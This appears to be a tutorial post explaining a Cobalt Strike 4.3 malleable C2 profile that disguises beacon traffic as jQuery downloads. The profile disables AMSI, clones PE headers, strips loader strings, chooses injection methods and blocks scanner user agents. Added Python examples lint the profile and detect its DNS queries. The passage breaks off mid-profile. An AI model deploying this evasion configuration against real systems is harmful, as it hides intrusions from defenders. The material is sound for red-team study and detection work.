This post uses the latest jquery-c2.4.3.profile as the example and records what each setting does. The applicable scenarios of some settings are not yet clear to me; they will be filled in as I continue to study.

Cobalt Strike 4.3 official documentation: https://cobaltstrike.com/downloads/csmanual43.pdf

Tips

  1. Parameters and values: the profile file wraps values in double quotes, not single quotes. For example:
     Correct: set useragent "SOME AGENT";
     Wrong:   set useragent 'SOME AGENT';
  2. Some special characters do not need escaping, for example: !@#$%^&*()
  3. Values may contain semicolons, for example:
     prepend "This is an example;";
  4. Double quotes inside a value must be escaped, for example:
     append "here is \"some\" stuff";
  5. A double backslash stands for a single backslash, for example:
     append "more \\ stuff";
  6. The compiled .http-post.client must be smaller than 252 bytes.

Configuration walkthrough

set sample_name "jQuery CS 4.3 Profile";

Sets the profile name; it is shown in the generated reports.

set sleeptime "45000";

Sets the sleep time after a Beacon checks in; 45000 is in milliseconds. Do not set this to 0: with a value of 0 the implant cannot check in. Cobalt Strike's default sleep time is 60000 ms.

set jitter "37";

Sets the jitter percentage; the default is 0.

set data_jitter "100";

Sets the data jitter size. When set, a random string of random length (up to the configured value) is appended to each request.

set headers_remove "Strict-Transport-Security, header2, header3";

Global option: forces Beacon's WinINet to remove the listed headers from HTTP/HTTPS requests.

set useragent "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko";

Sets the request User-Agent; combined with an nginx reverse proxy it can be used to hide the stage. The default is a random IE User-Agent. In CS versions below 4.2 the maximum length is 128 characters; in CS 4.2 and above it is 255.
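The quoting and escaping rules from the Tips section, together with the sleeptime, jitter and useragent limits noted above, can be checked mechanically before a profile is loaded. The Python below is an added example written for this page, not code from Cobalt Strike or from the original post: it parses `set`/`prepend`/`append` statements, decodes the `\"`, `\\` and `\xNN` escapes to bytes, rejects single-quoted values, and lints the decoded settings. The sample profile fragment, the 0 to 99 jitter range and the wording of the lint messages are constructed assumptions.

```python
import re

# Constructed sample fragment (not the page's full profile). It exercises the
# quoting rules from the Tips section plus the basic settings discussed above.
SAMPLE_PROFILE = r'''
set sample_name "jQuery CS 4.3 Profile";
set sleeptime "45000";
set jitter "37";
set useragent "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko";
prepend "This is an example;";
append "here is \"some\" stuff";
append "more \\ stuff";
set tcp_frame_header "\x80";
'''

# One statement per line: set NAME "value";  or  prepend|append "value";
# The value may contain semicolons and escaped quotes, so it is matched as a
# run of non-quote characters or backslash escapes.
_STMT = re.compile(r'^\s*(?:set\s+(\w+)|(prepend|append))\s+"((?:[^"\\]|\\.)*)"\s*;\s*$')
_SINGLE_QUOTED = re.compile(r"^\s*(?:set\s+\w+|prepend|append)\s+'")
_HEX = "0123456789abcdefABCDEF"


def unescape(raw):
    r"""Decode a quoted value body: \" -> ", \\ -> \, \xNN -> one raw byte."""
    out = bytearray()
    i = 0
    while i < len(raw):
        ch = raw[i]
        if ch != "\\":
            out += ch.encode("utf-8")
            i += 1
            continue
        nxt = raw[i + 1:i + 2]
        hexpart = raw[i + 2:i + 4]
        if nxt == "x" and len(hexpart) == 2 and all(c in _HEX for c in hexpart):
            out.append(int(hexpart, 16))
            i += 4
        elif nxt in ('"', "\\"):
            out += nxt.encode("utf-8")
            i += 2
        else:
            raise ValueError(f"unsupported escape {raw[i:i + 2]!r} at offset {i}")
    return bytes(out)


def parse_profile(text):
    """Return a list of (keyword, name, decoded value); reject single-quoted values."""
    stmts = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        if _SINGLE_QUOTED.match(line):
            raise ValueError(f"line {lineno}: values must be wrapped in double quotes")
        m = _STMT.match(line)
        if not m:
            raise ValueError(f"line {lineno}: cannot parse {line!r}")
        name, keyword, body = m.group(1), m.group(2) or "set", m.group(3)
        stmts.append((keyword, name or "", unescape(body)))
    return stmts


def lint(stmts):
    """Apply the limits the page states; the 0-99 jitter range is an assumption."""
    settings = {n: v.decode("utf-8", "replace") for kw, n, v in stmts if kw == "set"}
    problems = []
    if settings.get("sleeptime") == "0":
        problems.append("sleeptime is 0: Beacon will not check in")
    jitter = settings.get("jitter")
    if jitter is not None and not (jitter.isdigit() and int(jitter) <= 99):
        problems.append(f"jitter {jitter!r} is not a percentage in 0-99")
    ua = settings.get("useragent", "")
    if len(ua) > 255:
        problems.append(f"useragent is {len(ua)} chars; limit is 255 (128 before CS 4.2)")
    return problems


if __name__ == "__main__":
    for stmt in parse_profile(SAMPLE_PROFILE):
        print(stmt)
    print("lint:", lint(parse_profile(SAMPLE_PROFILE)))
```

The parser returns raw bytes rather than text because values such as `tcp_frame_header "\x80"` are byte strings, and the 252-byte limit on the compiled `.http-post.client` is a byte count, not a character count.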

https-certificate {
    ## Option 1) Use a trusted signed certificate
    ## Use keytool to create a Java Keystore file.
    ## See: https://www.cobaltstrike.com/help-malleable-c2#validssl
    ## See: https://github.com/killswitch-GUI/CobaltStrike-ToolKit/blob/master/HTTPsC2DoneRight.sh

    ## Option 2) Use your own self-signed certificate
    ## Use keytool to import the self-signed certificate
    #set keystore "/pathtokeystore";   # path to the keystore
    #set password "password";          # certificate password

    ## Option 3) Use Cobalt Strike's self-signed certificate
    set C   "US";
    set CN  "jquery.com";
    set O   "jQuery";
    set OU  "Certificate Authority";
    set validity "365";
}

SSL certificate settings: they sign the C2's HTTPS listener with a signed or self-signed certificate. By default all certificate fields are empty. Cobalt Strike's official recommendation here is to use a trusted, signed certificate.

set tcp_port "42585";
set tcp_frame_header "\x80";

Settings for the TCP Beacon. Details on the TCP listener port: https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/ and https://www.cobaltstrike.com/help-tcp-beacon . tcp_frame_header prepends the configured bytes to each TCP message. Cobalt Strike's default TCP listener port is 4444, with nothing prepended to messages.
Official guidance: do not listen on port 4444; use a high port instead.

set pipename         "mojo.5688.8052.183894939787088877##"; # Common Chrome named pipe
set pipename_stager  "mojo.5688.8052.35780273329370473##"; # Common Chrome named pipe
set smb_frame_header "\x80";

Settings for the SMB Beacon, which uses SMB for peer-to-peer communication. The SMB frame header option was added in CS 4.1. The CS default pipe name is msagent_## and the default pipename_stager is status_##.
Official advice: do not use a pipe name that already exists; Beacon does not check whether its pipe name collides with an existing one. Users of this profile must replace ## with digits.

dns-beacon {
    # Options moved into "dns-beacon" group in version 4.3
    set dns_idle           "74.125.196.113"; # google.com (change this to match your campaign)
    set dns_max_txt        "252";
    set dns_sleep          "0"; # Force a sleep prior to each individual DNS request. (in milliseconds)
    set dns_ttl            "5";
    set maxdns             "255";
    set dns_stager_prepend ".resources.123456.";
    set dns_stager_subhost ".feeds.123456.";

    # DNS subhosts override options, added in version 4.3
    set beacon           "a.bc.";
    set get_A            "b.1a.";
    set get_AAAA         "c.4a.";
    set get_TXT          "d.tx.";
    set put_metadata     "e.md.";
    set put_output       "f.po.";
    set ns_response      "zero";
}

Settings for the DNS Beacon. A DNS Beacon generates a large volume of DNS queries, so it is best used as a low-speed backup C2 channel.
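Because the profile pins the DNS label prefixes (beacon, get_A, get_AAAA, get_TXT, put_metadata, put_output), the stager prefixes and the dns_idle answer, a defender reviewing resolver logs can match on exactly those values. The Python below is an added example for this page, not part of the original post or of Cobalt Strike. It assumes the subhost value appears as the leading labels of the query name and that the stager prefixes appear as inner labels; the log lines, client addresses and the campaign domain example-c2.test are constructed.

```python
from collections import Counter

# Label prefixes pinned by the profile's dns-beacon block (channel -> subhost).
PROFILE_SUBHOSTS = {
    "beacon": "a.bc.",
    "get_A": "b.1a.",
    "get_AAAA": "c.4a.",
    "get_TXT": "d.tx.",
    "put_metadata": "e.md.",
    "put_output": "f.po.",
}
# dns_stager_prepend / dns_stager_subhost from the same block
STAGER_PREFIXES = (".resources.123456.", ".feeds.123456.")
# The A record answered when the server has nothing for the Beacon
DNS_IDLE = "74.125.196.113"

# Constructed resolver log: "<time> <client> <qname> <qtype> <answer>" (not real data).
SAMPLE_LOG = """\
2024-01-01T10:00:00Z 10.0.0.5 a.bc.19997cf2.example-c2.test A 74.125.196.113
2024-01-01T10:00:01Z 10.0.0.5 b.1a.19997cf2.example-c2.test A 74.125.196.113
2024-01-01T10:00:02Z 10.0.0.5 d.tx.19997cf2.example-c2.test TXT -
2024-01-01T10:00:03Z 10.0.0.7 www.example.com A 203.0.113.10
2024-01-01T10:00:04Z 10.0.0.9 abc.internal.example.com A 10.1.2.3
"""


def classify_qname(qname):
    """Return the profile channel a query name belongs to, or None."""
    q = qname.lower().rstrip(".") + "."
    for channel, prefix in PROFILE_SUBHOSTS.items():
        # Whole-label match: "a.bc." must be the first two labels, so
        # "abc.internal..." does not fire.
        if q.startswith(prefix):
            return channel
    for prefix in STAGER_PREFIXES:
        if prefix in q:
            return "stager"
    return None


def scan_dns_log(text):
    """Return (client, channel, qname, qtype, answer_is_dns_idle) per matching query."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        _ts, client, qname, qtype, answer = line.split()
        channel = classify_qname(qname)
        if channel is None:
            continue
        hits.append((client, channel, qname, qtype, answer == DNS_IDLE))
    return hits


def clients_by_hits(hits):
    """Count matching queries per client; a Beacon produces many per sleep cycle."""
    return Counter(client for client, *_ in hits)


if __name__ == "__main__":
    found = scan_dns_log(SAMPLE_LOG)
    for hit in found:
        print(hit)
    print(clients_by_hits(found))
```

Matching on the first labels only, rather than on a substring, is what keeps the benign `abc.internal.example.com` query out of the results; the `answer_is_dns_idle` flag is a second signal, since a legitimate host name rarely resolves to exactly the idle address the profile chose.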

set ssh_banner        "OpenSSH_7.4 Debian (protocol 2.0)";
set ssh_pipename      "wkssvc##";

Settings for the SSH Beacon, which uses the SSH protocol for peer-to-peer communication. Available since Cobalt Strike 4.1.

set host_stage "false";

host_stage is not recommended; use stageless payloads instead, which are now Cobalt Strike's default.

http-stager {
    # x86 stager request URI
    set uri_x86 "/jquery-3.3.1.slim.min.js";
    # x64 stager request URI
    set uri_x64 "/jquery-3.3.2.slim.min.js";

    server {
        # server-side settings
        # response headers
        header "Server" "NetDNA-cache/2.2";
        header "Cache-Control" "max-age=0, no-cache";
        header "Pragma" "no-cache";
        header "Connection" "keep-alive";
        header "Content-Type" "application/javascript; charset=utf-8";

        output {
            ## Prepend the jQuery source to the real response as a disguise.
            prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n.sort,splice:n.splice},w.extend=w.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for(\"boolean\"==typeof a&&(l=a,a=arguments[s]||{},s++),\"object\"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:\"jQuery\"+(\"3.3.1\"+Math.random()).replace(/\\D/g,\"\"),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||\"[object Object]\"!==c.call(e))&&(!(t=i(e))||\"function\"==typeof(n=f.call(t,\"constructor\")&&t.constructor)&&p.call(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)},each:function(e,t){var n,r=0;if(C(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?\"\":(e+\"\").replace(T,\"\")},makeArray:function(e,t){var n=t||[];return null!=e&&(C(Object(e))?w.merge(n,\"string\"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),\"function\"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each(\"Boolean Number String Function Array Date RegExp Object Error Symbol\".split(\" \"),function(e,t){l[\"[object \"+t+\"]\"]=t.toLowerCase()});function C(e){var t=!!e&&\"length\"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&(\"array\"===n||0===t||\"number\"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P=\"\r";
            # 1st Line
            prepend "/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */";
            append "\".(o=t.documentElement,Math.max(t.body[\"scroll\"+e],o[\"scroll\"+e],t.body[\"offset\"+e],o[\"offset\"+e],o[\"client\"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each(\"blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu\".split(\" \"),function(e,t){w.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});";
            print;
        }
    }

    client {
        # client request headers
        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
        header "Accept-Language" "en-US,en;q=0.5";
        #header "Host" "code.jquery.com";
        header "Referer" "http://code.jquery.com/";
        header "Accept-Encoding" "gzip, deflate";
    }
}

Settings for the HTTP stager.

post-ex {
    # Optionally specify non-existent filepath to force manual specification based on the Beacon host's running processes
    set spawnto_x86 "%windir%\\syswow64\\dllhost.exe";
    # Hardcode paths like C:\\Windows\\System32\\dllhost.exe to avoid potential detections for %SYSNATIVE% use. !! This will break when attempting to spawn a 64bit post-ex job from a 32bit Beacon.
    set spawnto_x64 "%windir%\\sysnative\\dllhost.exe";
    # change the permissions and content of our post-ex DLLs
    set obfuscate "true";
    # pass key function pointers from Beacon to its child jobs
    set smartinject "true";
    # disable AMSI in powerpick, execute-assembly, and psinject
    set amsi_disable "true";
    # Modify our post-ex pipe names
    set pipename "Winsock2\\CatalogChangeListener-###-0,";
    set keylogger "GetAsyncKeyState";
    #set threadhint "module!function+0x##"
}

Settings for spawnto.
Official guidance: spawnto is limited to 63 bytes. Never choose any of these as the spawn target: "csrss.exe", "logoff.exe", "rdpinit.exe", "bootim.exe", "smss.exe", "userinit.exe", "sppsvc.exe". Arguments can be passed to the spawned program.
With obfuscate enabled, the contents of the post-ex DLLs are scrambled, making the whole process safer.
With amsi_disable enabled, AMSI checks are suppressed before the powerpick, execute-assembly and psinject commands run.

stage {
    # CS 4.2 memory allocation method; three are supported: HeapAlloc, MapViewOfFile, and VirtualAlloc
    set allocator      "VirtualAlloc"; # Options are: HeapAlloc, MapViewOfFile, and VirtualAlloc
    # Override the first bytes of Beacon's Reflective DLL (including the MZ header). Must be valid x86 instructions. Follow any instruction that changes CPU state with one that undoes the change.
    #set magic_mz_x86   "MZRE";
    #set magic_mz_x64   "MZAR";
    # Override the PE character marker used by Beacon's Reflective Loader with another value.
    set magic_pe       "NO";
    # Ask the ReflectiveLoader to use or avoid RWX permissions for the Beacon DLL in memory
    set userwx         "false";
    # Ask the ReflectiveLoader to stomp the MZ, PE, and e_lfanew values after it loads Beacon.
    set stomppe        "true";
    # Obfuscate the Reflective DLL's import table, overwrite unused header content, and ask the ReflectiveLoader to copy Beacon to new memory without its DLL headers. As of 4.2, CS also obfuscates the .text section of the rDLL package
    set obfuscate      "true";
    # Ask Beacon to attempt to free the memory associated with the Reflective DLL package that initialized it.
    set cleanup        "true";
    # CS 3.12 Addition "Obfuscate and Sleep"
    set sleep_mask     "true";
    # CS 4.1
    set smartinject    "true";

    # Make the Beacon Reflective DLL look like something else in memory
    # Values captured using peclone against a Windows 10 version of explorer.exe
    # PE header checksum
    set checksum       "0";
    # PE header compile time
    set compile_time   "11 Nov 2016 04:08:32";
    # PE header entry point
    set entry_point    "650688";
    # 32-bit PE header image size
    set image_size_x86 "4661248";
    # 64-bit PE header image size
    set image_size_x64 "4661248";
    # exported DLL name
    set name           "srv.dll";
    # metadata inserted by the compiler
    set rich_header    "\x3e\x98\xfe\x75\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x73\x81\x03\x26\xfc\xf9\x90\x26\x17\xa4\x93\x27\x79\xf9\x90\x26\x7a\xf9\x91\x26\x83\xfd\x90\x26\x17\xa4\x91\x27\x65\xf9\x90\x26\x17\xa4\x95\x27\x77\xf9\x90\x26\x17\xa4\x94\x27\x6c\xf9\x90\x26\x17\xa4\x9e\x27\x56\xf8\x90\x26\x17\xa4\x6f\x26\x7b\xf9\x90\x26\x17\xa4\x92\x27\x7b\xf9\x90\x26\x52\x69\x63\x68\x7a\xf9\x90\x26\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";

    ## WARNING: Module stomping
    # Cobalt Strike 3.11 also adds module stomping to Beacon's Reflective Loader. When enabled, Beacon's loader will shun VirtualAlloc and instead load a DLL into the current process and overwrite its memory.
    # Set module_x86 to a favorite x86 DLL to module stomp with the x86 Beacon. The module_x64 option enables this for the x64 Beacon.
    # While this is a powerful feature, caveats apply! If the library you load is not large enough to host Beacon, you will crash Beacon's process. If the current process loads the same library later (for whatever reason), you will crash Beacon's process. Choose carefully.
    # By default, Beacon's loader allocates memory with VirtualAlloc. Module stomping is an alternative to this. Set module_x86 to a DLL that is about twice as large as the Beacon payload itself. Beacon's x86 loader will load the specified DLL, find its location in memory, and overwrite it. This is a way to situate Beacon in memory that Windows associates with a file on disk. It's important that the DLL you choose is not needed by the applications you intend to reside in. The module_x64 option is the same story, but it affects the x64 Beacon.
    # Details can be found in the In-memory Evasion video series. https://youtu.be/uWVH9l2GMw4
    # set module_x64 "netshell.dll";
    # set module_x86 "netshell.dll";

    # The transform-x86 and transform-x64 blocks pad and transform Beacon's Reflective DLL stage. These blocks support three commands: prepend, append, and strrep.
    transform-x86 { # transform the x86 rDLL stage
        # prepend bytes before the shellcode
        prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # prepend nops
        # replace sensitive strings
        strrep "ReflectiveLoader" "execute"; # Change this text
        # remove sensitive strings
        strrep "This program cannot be run in DOS mode" ""; # Remove this text
        strrep "beacon.dll" ""; # Remove this text
    }
    transform-x64 { # transform the x64 rDLL stage
        prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # prepend nops
        strrep "ReflectiveLoader" "execute"; # Change this text in the Beacon DLL
        strrep "beacon.x64.dll" ""; # Remove this text in the Beacon DLL
    }

    stringw "jQuery"; # Add this string to the DLL
}

Settings for the stage.

process-inject {
    # remote memory allocation method: VirtualAllocEx|NtMapViewOfSection
    set allocator "NtMapViewOfSection";
    # minimum memory allocation size when injecting content
    set min_alloc "17500";
    # memory permissions: initial=RWX, final=RX
    set startrwx "false";
    set userwx   "false";

    # Transform the injected content to avoid signature detection of its first few bytes. Only prepend and append are supported.
    transform-x86 {
        prepend "\x90\x90";
        #append "\x90\x90";
    }
    transform-x64 {
        prepend "\x90\x90";
        #append "\x90\x90";
    }

    ## The execute block controls the methods Beacon will use when it needs to inject code into a process. Beacon examines each option in the execute block, determines if the option is usable for the current context, tries the method when it is usable, and moves on to the next option if code execution did not happen. The execute options include:
    #
    # Name                      x86->x64    x64-x86     Notes
    #########################################################################
    # CreateThread                                      Current Process only
    # CreateRemoteThread                       Yes      No cross-session
    # NtQueueApcThread
    # NtQueAPCThread-s                                  This is the "Early Bird" injection technique. Suspended processes (e.g., post-ex jobs) only.
    # RtlCreateUserThread           Yes        Yes      Risky on XP-era targets; uses RWX shellcode for x86->x64 injection.
    # SetThreadContext                         Yes      Suspended processes (e.g. post-ex jobs only)

    execute {
        # The order below matters: CS tries each method in turn until injection succeeds.
        #
        ## self-injection
        CreateThread "ntdll!RtlUserThreadStart+0x42";
        CreateThread;

        ## injection via a suspended process (SetThreadContext|NtQueueApcThread-s)
        # OPSEC - with SetThreadContext the thread's start address will reflect the original entry point of the temporary process.
        # SetThreadContext;
        NtQueueApcThread-s;

        ## injection into an existing process
        # OPSEC - uses an RWX stub, detected by Get-InjectedThread. Less often detected by some defensive products.
        #NtQueueApcThread;

        # CreateRemoteThread - vanilla cross-process injection technique. Does not cross session boundaries
        # OPSEC - fires Sysmon Event 8
        CreateRemoteThread;

        # RtlCreateUserThread - supports all architecture-dependent corner cases (e.g. 32-bit -> 64-bit injection) and injection across session boundaries
        # OPSEC - fires Sysmon Event 8. Uses Meterpreter implementation and RWX stub - Detected by Get-InjectedThread
        RtlCreateUserThread;
    }
}

Process injection settings.

http-config {
    # HTTP response headers
    set headers "Date, Server, Content-Length, Keep-Alive, Connection, Content-Type";
    header "Server" "Apache";
    header "Keep-Alive" "timeout=10, max=100";
    header "Connection" "Keep-Alive";
    # Use this option if your teamserver sits behind a redirector
    set trust_x_forwarded_for "true";
    # Requests with these User-Agents are answered with a 404
    set block_useragents "*virustotal*,curl*,lynx*,wget*";
}

HTTP server settings.

http-get {
    # request URI; multiple URIs may be listed and Beacon picks one at random
    set uri "/jquery-3.3.1.min.js";
    # request method
    set verb "GET";

    client {
        # client request headers
        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
        #header "Host" "code.jquery.com";
        header "Referer" "http://code.jquery.com/";
        header "Accept-Encoding" "gzip, deflate";

        metadata {
            base64url;
            prepend "__cfduid=";
            header "Cookie";
        }
    }

    server {
        # server-side settings
        header "Server" "NetDNA-cache/2.2";
        header "Cache-Control" "max-age=0, no-cache";
        header "Pragma" "no-cache";
        header "Connection" "keep-alive";
        header "Content-Type" "application/javascript; charset=utf-8";

        output {
            mask;
            base64url;
            ## The javascript was changed.  Double quotes and backslashes were escaped to properly render (Refer to Tips for Profile Parameter Values)
            # 2nd Line
            prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n.sort,splice:n.splice},w.extend=w.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for(\"boolean\"==typeof a&&(l=a,a=arguments[s]||{},s++),\"object\"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:\"jQuery\"+(\"3.3.1\"+Math.random()).replace(/\\D/g,\"\"),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||\"[object Object]\"!==c.call(e))&&(!(t=i(e))||\"function\"==typeof(n=f.call(t,\"constructor\")&&t.constructor)&&p.call(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)},each:function(e,t){var n,r=0;if(C(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?\"\":(e+\"\").replace(T,\"\")},makeArray:function(e,t){var n=t||[];return null!=e&&(C(Object(e))?w.merge(n,\"string\"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),\"function\"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each(\"Boolean Number String Function Array Date RegExp Object Error Symbol\".split(\" \"),function(e,t){l[\"[object \"+t+\"]\"]=t.toLowerCase()});function C(e){var t=!!e&&\"length\"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&(\"array\"===n||0===t||\"number\"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P=\"\r";
            # 1st Line
